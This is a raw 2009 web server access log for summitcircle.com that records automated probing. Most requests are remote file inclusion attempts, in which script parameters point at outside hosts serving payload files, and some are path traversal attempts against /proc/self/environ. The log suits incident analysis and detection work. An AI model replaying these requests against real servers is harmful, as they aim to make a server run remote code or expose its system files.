218.234.21.178 - - [28/Jun/2009:20:00:42 -0700] "GET /logs/access_090119.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:00:47 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:00:47 -0700] "GET /logs/access_090119.log//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:00:47 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
194.63.248.44 - - [28/Jun/2009:20:00:54 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
194.63.248.44 - - [28/Jun/2009:20:00:54 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
194.63.248.44 - - [28/Jun/2009:20:00:54 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:00:56 -0700] "GET /login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:00:56 -0700] "GET /logs//login.php?dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:12 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:12 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:12 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:12 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:12 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:12 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:13 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:13 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:13 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:13 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:13 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
91.195.124.16 - - [28/Jun/2009:20:03:13 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "summitcircle.com"
194.63.248.44 - - [28/Jun/2009:20:04:26 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://auction.localtreasures.net/includes/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:05:18 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:05:18 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:05:18 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:06:02 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:06:02 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:06:02 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
124.115.1.59 - - [28/Jun/2009:20:06:13 -0700] "GET / HTTP/1.1" 200 779 "http://www.summitcircle.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.summitcircle.com"
60.43.229.5 - - [28/Jun/2009:20:06:19 -0700] "GET /logs/access_090209.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:06:25 -0700] "GET /logs/access_081201.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:06:38 -0700] "GET /logs/access_090413.log//classes/adodbt/sql.php?classes_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
65.23.158.226 - - [28/Jun/2009:20:06:45 -0700] "GET /logs/access_081201.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:49 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:49 -0700] "GET /logs/access.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:49 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:50 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:50 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:50 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:58 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:58 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:06:58 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:06:59 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:06:59 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:06:59 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:07:08 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:07:08 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:07:08 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
60.43.229.5 - - [28/Jun/2009:20:08:28 -0700] "GET /logs/access_090104.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:08:36 -0700] "GET /logs/access_081201.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:08:40 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
218.234.21.178 - - [28/Jun/2009:20:08:40 -0700] "GET /logs/access_081201.log//modules/TotalCalendar/about.php?inc_dir=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:08:40 -0700] "GET /logs/access_081201.log//modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:08:40 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:09:20 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:09:20 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
199.120.90.222 - - [28/Jun/2009:20:09:20 -0700] "GET /logs/access_081201.log//modules/vwar/admin/admin.php?vwar_root=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.254.216.47 - - [28/Jun/2009:20:10:18 -0700] "GET /modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.254.216.47 - - [28/Jun/2009:20:10:18 -0700] "GET /logs/access_090119.log%20%20//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
65.254.216.47 - - [28/Jun/2009:20:10:18 -0700] "GET /logs//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:10:59 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:10:59 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
88.81.249.202 - - [28/Jun/2009:20:10:59 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motherwellfc.co.uk/fx1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "summitcircle.com"
87.106.54.126 - - [28/Jun/2009:20:11:10 -0700] "GET /modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.54.126 - - [28/Jun/2009:20:11:10 -0700] "GET /logs/access_090119.log%20%20//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.54.126 - - [28/Jun/2009:20:11:10 -0700] "GET /logs//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.54.177.242 - - [28/Jun/2009:20:12:35 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.54.177.242 - - [28/Jun/2009:20:12:35 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.54.177.242 - - [28/Jun/2009:20:12:35 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
200.54.177.242 - - [28/Jun/2009:20:13:27 -0700] "GET /logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.244.235.254 - - [28/Jun/2009:20:13:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.244.235.254 - - [28/Jun/2009:20:13:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.244.235.254 - - [28/Jun/2009:20:13:48 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:14:00 -0700] "GET /logs/access_081201.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:14:01 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:20:14:02 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
195.210.57.83 - - [28/Jun/2009:20:14:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.summitcircle.com"
195.210.57.83 - - [28/Jun/2009:20:14:05 -0700] "GET /logs/access_080331.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.summitcircle.com"
200.54.177.242 - - [28/Jun/2009:20:14:24 -0700] "GET /logs/access_090119.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://barfod.no/image/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:20:16:21 -0700] "GET /modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:20:16:22 -0700] "GET /logs//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
81.177.9.20 - - [28/Jun/2009:20:16:22 -0700] "GET /logs/access_090119.log%20%20//modules/agendax/addevent.inc.php%20agendax_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:16:27 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:16:27 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:16:27 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
60.43.229.5 - - [28/Jun/2009:20:16:59 -0700] "GET /logs/access_081201.log/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:17:02 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:17:03 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:17:03 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.210.57.83 - - [28/Jun/2009:20:17:08 -0700] "GET /wsnlinks/index.php?action=displaycat&catid=7 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:17:17 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:20:17:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:20:17:18 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
201.232.54.48 - - [28/Jun/2009:20:17:18 -0700] "GET /logs/access_090202.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
